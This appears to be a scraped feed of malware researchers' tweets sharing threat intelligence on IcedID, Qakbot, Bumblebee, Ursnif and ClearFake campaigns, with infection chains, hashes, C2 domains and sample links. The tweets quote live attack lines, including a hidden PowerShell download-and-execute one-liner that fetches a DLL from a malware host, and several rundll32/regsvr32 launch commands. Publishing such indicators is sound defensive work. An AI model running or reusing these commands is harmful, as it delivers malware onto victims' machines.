malwarelabnet

A simple project to submit malware to MalwareBazaar bazaar.abuse.ch/user/129972995…

@AvastThreatLabs That looks like FakeUpdateRU (blog.sucuri.net/2023/10/fakeup…) not ClearFake (blog.sekoia.io/clearfake-a-ne…)?

Ongoing #FakeUpdates #ClearFake campaign targetting Argentina 🇦🇷, Mexico 🇲🇽 and France 🇫🇷 pushing #zgRAT via multiple compromised domains.

@BiteFre4k @pmmkowalczyk @CERT_OPL @500mk500 @arturaugustyni2 @kilijanek @abuse_ch @pr0xylife @reecdeep @JAMESWT_MHT A similar campaign with the same infra last week was email>pdf>url>url>js>url>dll

@pmmkowalczyk @CERT_OPL @500mk500 @arturaugustyni2 @kilijanek @abuse_ch @pr0xylife @reecdeep @JAMESWT_MHT Email spam ?

#IcedID campaign spotted in 🇵🇱 rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\441372.dat,vcab /k zefirka748 md5: 9f008ed4394230c96e4d1ae70f01b637 @CERT_OPL @500mk500 @arturaugustyni2 @kilijanek @abuse_ch @pr0xylife @reecdeep @JAMESWT_MHT

@k3dg3 Got a good run here: tria.ge/221108-yklm3ag…

#Bumblebee HTML Attachments rolling in. general pattern: Document_[0-9]{4]_Scan_(Nov8)\.html Looks like some updated evasion in this sample. bazaar.abuse.ch/sample/99deeff…

@jpvigneault @executemalware This should be similar: bazaar.abuse.ch/sample/6cf4b68…

@executemalware Can you share the maldoc on Bazaar or VT? Cheers

I also looked at an #icedid #bokbot sample from today. The email had an attached .doc file with heavily obfuscated macros. This infection flow is new to me for #icedid: .doc -> vba -> embedded .dll dropped and launched IOCs: github.com/executemalware…

@pr0xylife @executemalware @ffforward @Cryptolaemus1 @ankit_anubhav @Max_Mal_ @JAMESWT_MHT @1ZRR4H @fr0s7_ @Myrtus0x0 You're fast ;) , here's another tria.ge/220919-tvdb8ag…

#Bumblebee - .zip > .iso > .lnk > .bat > ps > .dll powershell -w hidden -nop -ep bypass -enc iex (new-object net.webclient).downloadstring("http://meeronixt.]com/gate/dll/12.dll") rundll32.exe C:\Users\**\AppData\Local\mIOPiX.bin,CreateTask IOC's github.com/pr0xylife/Bumb…

#IcedID *.document.09.09.22.xlsm > DLL 94c90a08262f15574b39eada9d0b041c > C2 > audifastinggip[.]com Sample: bazaar.abuse.ch/sample/fc09f20…

#IcedID Invoice-Sep-09-document-*-scan.zip > ISO > DLL cebd895e436afbb98221762821847142 > C2 > trakonicwe[.com Sample: bazaar.abuse.ch/sample/d2f9722…

Incoming zip>iso>bat/lnk/dll #IcedID bazaar.abuse.ch/sample/fde6a84…

@58_158_177_102 #ursnif payload from fierstar[.]com bazaar.abuse.ch/sample/da273d3…

#cutwail start to spread #maldoc Subject : Rateizzazione del debito Agenzia delle entrate-Riscossione - Protocollo n. * md5 : 9737703391db4a58cead1e1525719cb0 payload from : fierstar[.]com ? sample : virustotal.com/gui/file/50e12… (2/62) tria.ge/220720-ls12hae…

Reached the milestone of 2500 samples submitted to @abuse_ch :)

#IcedID password-protected zip > iso > lnk > dll c2: bransfortrionaf[.]com bazaar.abuse.ch/sample/8947a3d…

@ankit_anubhav @1ZRR4H @Max_Mal_ Didn't have time to dig, but these are probably some additional recent ones: bazaar.abuse.ch/sample/5eb4679… bazaar.abuse.ch/sample/3ef6819…

#Aggah / #Hagga attack flow 21.06.2022 As usual, they try very hard. bazaar.abuse.ch/sample/6ed7b3c…

@log4jay @pr0xylife @1ZRR4H @executemalware @ffforward @ankit_anubhav @Max_Mal_ @malwarelabnet @malware_traffic @JAMESWT_MHT @fr0s7_ Using an ISO is for bypassing defenses. It will in some cases not even be scanned by AV. In other cases this vector usage will prevent metadata being applied to the file called the Mark of the Web or MOTW. This prevents Windows from tagging it as from the web and not safe.

@bigmacjpg @GootLoaderSites Here's an example of the first stage: bazaar.abuse.ch/sample/f3558f2…

@GootLoaderSites Do you upload the zip/js payloads to VT or MalwareBazaar? If so, could you post the payload hashes along with the URLs?

@InQuest payload is vidar bazaar.abuse.ch/sample/516aa64…

Some threat group has started using transfer.sh to host their pivots, some examples: labs.inquest.net/dfi/search/ioc…

@pr0xylife @hatching_io @James_inthe_box @JRoosen @0xtornado @osipov_ar @sugimu_sec qakbot payload, obama182 bazaar.abuse.ch/sample/454cab7…

@hatching_io @James_inthe_box @JRoosen @0xtornado @osipov_ar @sugimu_sec Config extraction seems to be an issue.

#Qakbot - obama182 - url > .zip > .xlsb > .dll CreateDirectory C:\Merto CreateDirectory C:\Merto\Byrost regsvr32 /s calc regsvr32 C:\Merto\Byrost\Veonse.OOOCCCXXX IOC's github.com/pr0xylife/Qakb…

@1ZRR4H @fr0s7_ @pr0xylife @Max_Mal_ @Ledtech3 CAPE got a partial extract: capesandbox.com/analysis/26873…

@fr0s7_ @pr0xylife @Max_Mal_ DLL payloads from: /souq-in.com/12cb11N6/fnh.png /medluminous.com/1PSm1BI3PAJr/fnh.png /yqsigo.com/4xU1mMFW/fnh.png 🔽 bazaar.abuse.ch/sample/55aaeb9… Run by Hatching: tria.ge/220505-abc3kah… (no config extraction for this one for now) 🤔 / cc: @Ledtech3

#QakBot what are you doing lately? Using EXPAND to decompress cab files into .dll than calling it with regsvr32. drop-url either not working or dead but i can't get the payload. app.any.run/tasks/ed702eb2… @pr0xylife @Max_Mal_ @1ZRR4H

@Max_Mal_ @fr0s7_ @1ZRR4H @pr0xylife This is the DLL from inside the downloaded CAB: tria.ge/220504-3phjese…

@fr0s7_ @1ZRR4H @pr0xylife Could you please share the DLL payload?

@58_158_177_102 payload is from: investoriant[.]com > ursnif/3000 bazaar.abuse.ch/sample/22a462b…

#cutwail start to spread #maldoc #ursnif Subject : Richiesta per invio Mail al Cliente * MD5 : bda0c23f9cd91512429cb679d411966e Payload from : inversinbiz[.]com sample : app.any.run/tasks/ce889e7c… virustotal.com/gui/file/08868… (3/58) tria.ge/220504-lsm5msg…

@pr0xylife @executemalware @ffforward @Cryptolaemus1 @ankit_anubhav @Max_Mal_ @fr0s7_ @1ZRR4H @JAMESWT_MHT @Myrtus0x0 xlsb sig = SETA GROUP LIMITED

#Qakbot - AA - url > .zip > .xlsb > .dll "Marked as Final". CreateDirectory C:\Yerto CreateDirectory C:\Yerto\Narost regsvr32 /s calc regsvr32 C:\Yerto\Narost\Beunse.oooooooccccccccxxxxxxxx IOC's github.com/pr0xylife/Qakb…